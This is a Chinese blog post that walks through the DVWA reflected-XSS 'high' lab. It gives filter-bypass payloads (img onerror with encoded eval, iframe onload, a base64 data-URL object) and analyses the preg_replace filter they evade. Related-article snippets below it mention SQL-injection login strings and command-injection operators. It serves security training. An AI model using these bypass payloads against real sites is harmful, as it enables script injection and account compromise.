DVWA - XSS Relected(high)

最新推荐文章于 2024-09-12 16:34:08 发布
最新推荐文章于 2024-09-12 16:34:08 发布
阅读量286 收藏
点赞数
分类专栏: dvwa
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42630215/article/details/106661782
版权
本文探讨了如何在DVWA的XSS反射(高)级别中,通过利用img标签的事件、iframe标签及DATA URL等方式,绕过源码对<script>的严格过滤。介绍了三种方法,并分析了high级别防护下的preg_replace正则过滤机制。
摘要由CSDN通过智能技术生成

最普通的payload

 <script>alert(1)</script>

在这里插入图片描述
大小写,双写都不可以,源码对任何形式的script做了过滤所以可以采用不使用 script 的方式。可以通过img、body等标签的事件或者iframe、src等标签的构造可利用的js代码。

方法一
使用 img 标签和其编码转换后的 XSS payload

<img src=1 onerror=alert(/xss/)>

在这里插入图片描述
mg标签编码转换后的XSS payload

<img src=1 onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>
<img src=1 onerror=eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41))></img>
<img src=1 onerror=eval("\u0061\u006c\u0065\u0072\u0074\u0028\u0027\u0078\u0073\u0073\u0027\u0029")></img>

方法二
使用 iframe 标签

<iframe onload=alert(/xss/)>

方法三
使用 DATA URL 进行 XSS

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4="></object>

代码分析
在这里插入图片描述

可以看到,high级别的代码使用了正则表达式直接把 <script 给过滤了,* 代表一个或多个任意字符,i 代表不区分大小写。preg_replace() 函数用于正则表达式的搜索和替换,这使得双写绕过、大小写混淆绕过(正则表达式中i表示不区分大小写)不再有效。

preg_replace 函数
在这里插入图片描述

S1xTwe1ve
关注
专栏目录
DVWA靶场
chenjyboke的博客
02-18 4200
XSS(跨站脚本攻击) DOM型 low 在url输入选择的语言,查看执行的内容 发现会发生改变,可以往后面写脚本,添加一个脚本运行 <script>alert('123')</script> <script> 标签用于定义客户端脚本,比如 JavaScript。 script 元素既可以包含脚本语句,也可以通过 src 属性指向外部脚本文件。 必需的 type 属性规定脚本的 MIME 类型。 js标签,alert是弹出一个窗口的意思,如al
dvwa
qq_30365511的博客
08-03 318
Brute Force low 直接爆破 或者万能密码 admin’ or ‘1’=‘1 admin’# medium 加了一个sleep(2),操作一样,多了个喝茶的时间。万能密码被转义了%df high 有了token验证,理论上要把上次返回的token,修改到这一次token,但脚本我不会 Command Injection low 四种连接 &,&&,|,|| medium 过滤了&&,我们用& high 不知道是不是bug他过滤了“| ”没有过滤
【渗透测试】——DVWA靶场搭建
最新发布
HinsCoder的博客
09-12 2579
DVWA是一个用于安全漏洞测试的 PHP/MySQL 网络应用,旨在为安全专业人士提供一个合法的环境,以测试他们的技能和工具,同时帮助 Web 开发者更好地理解 Web 应用的安全防护过程。
DVWA
这个博客,写给十年后的自己......
05-30 2754
安装 安装XAMPP sudo ./xampp-linux-x64-5.6.8-0-installer.run 设置XAMPP安全 sudo /opt/lampp/xampp secrrity 因为是一个随便玩的服务器,可以把所有密码都设置为asdasd sudo /opt/lamp/xampp start 刚才是只开了Apache,所以只能配置Apache的密码,
DVWA-master.zip
01-04
DVWA-master.zip文件包含了整个DVWA项目的源代码和相关资源,是学习和研究网络安全的理想工具。 1. **DVWA的结构与功能** DVWA由多个安全级别组成,包括“低”、“中”、“高”和“不可能”,每个级别都包含不同...
DVWA-master安装包
02-28
DVWA-master:深入探索Web安全的实践指南》 DVWA(Damn Vulnerable Web Application)是一款专门为网络安全教育设计的开源Web应用程序。它以其易用性和丰富的漏洞类型,为初学者和专业人士提供了一个理想的学习...
DVWA-master.7z 压缩包
09-14
这个"DVWA-master.7z"压缩包包含了完整的DVWA源代码和其他相关文件,用于在本地环境中搭建一个模拟的脆弱Web应用。 为了正确地使用这个压缩包,首先你需要下载它并使用解压缩工具(如7-Zip)将其解压。解压缩后,你...
DVWA(通关+代码分析)
weixin_53884648的博客
08-04 1628
简要概括和测试了DVWA全部漏洞
Linux下安装 Composer
weixin_39218464的博客
01-17 269
安装 Composer 为php设置环境 vim /etc/profile export PATH="$PATH:/usr/local/php/bin" 下载和安装composer cd /mnt curl -sS https://getcomposer.org/installer | php #curl -sS https://getcomposer.org/installer | /usr/local/php/bin/php mv composer.phar /usr/local/bin/c
dvwa官方版
09-22
适应于水平在初级小白到中级阶段的网络安全员,做一些渗透测试
DVWA-1.0.7
01-31
学习PHP漏洞挖掘大基友门有福了!希望大家能够使用这个平台能在漏洞挖掘方面有一定提升.
dvwa-简单版
lwbcsd的博客
01-25 799
Brute Force(Low) 从页面中可以看出这是一个输入账户和密码题。 方法一 用burp进行暴力破解 方法二 看页面是否有sql注入,显然这个页面是存在sql注入的。
DVWA--CRSF
weixin_30467087的博客
05-19 277
首先我们对CRSF进行一个介绍 CSRF,全称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。CSRF与XSS最大的区别就在于,CSR...
DVWA(Web 渗透的靶机环境)+csrf漏洞练习
net的博客
03-16 6805
用来进行安全脆弱性鉴定的PHP/MySQL Web 应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。十个攻击模块,分别是:1、Brute Force(暴力(破解))、2、Command Injection(命令行注入)、3、CSRF(跨站请求伪造)、4、- File Inclusion(文件包含)、5、File Upload(文件上传)、6、Insecure CAPTCHA (不安全的验证码)、
dvwa靶场
Fzuim的博客
11-21 4233
Burp Force low级别 burp抓包,爆破模块处理即可(low权限还存在一个sql注入漏洞) Medium级别 去除了sql漏洞,依然采用burp爆破方式 High级别 多引入一个token字段,此值在响应里面,依然采用burp爆破,设置如下 Impossible级别 密码错误达到上限,进行时间限制,基本上没法用burp爆破模式 Command Injection 命令执行,通过&&、&、||、|、;等连接符,执行多条命令 &&:先执行cmd1,
搭建dvwa
cndydmz的博客
02-15 426
首先在百度上下载PHP study和dvwa,分别将其解压。 并把dvwa文件夹放在PHP study的www里 找到dvwa的配置文件并将其改为如图所示 修改配置文件,如图 在浏览器输入http://127.0.0.1/DVWA-master/login.php 默认用户名为admin,密码为password,进入 完成 ...
解决DVWA中Command Injection中文乱码
野原新之助
01-23 1661
DVWA中进行Command Injection命令注入测试时,发现出现中文乱码。 经查询已解决,原因是编码方式的差异,将编码方式改为 GBK即可。 打开网站的根目录,找到DVWA目录,依次点击:DVWA -> dvwa -> includes,找到 dvwaPage.inc.php 文件 打开查找 utf-8,将第277行的 utf-8 改为 GBK即可。 ...
DVWA-XSS(DOM)
08-25
DVWA-XSS(DOM)是指DVWA靶机学习中的一种XSS攻击,它利用了DOM(文档对象模型)中的漏洞。DOM是一个与平台、编程语言无关的接口,允许程序或脚本动态地访问和更新文档内容、结构和样式。而DVWA-XSS(DOM)攻击则是通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值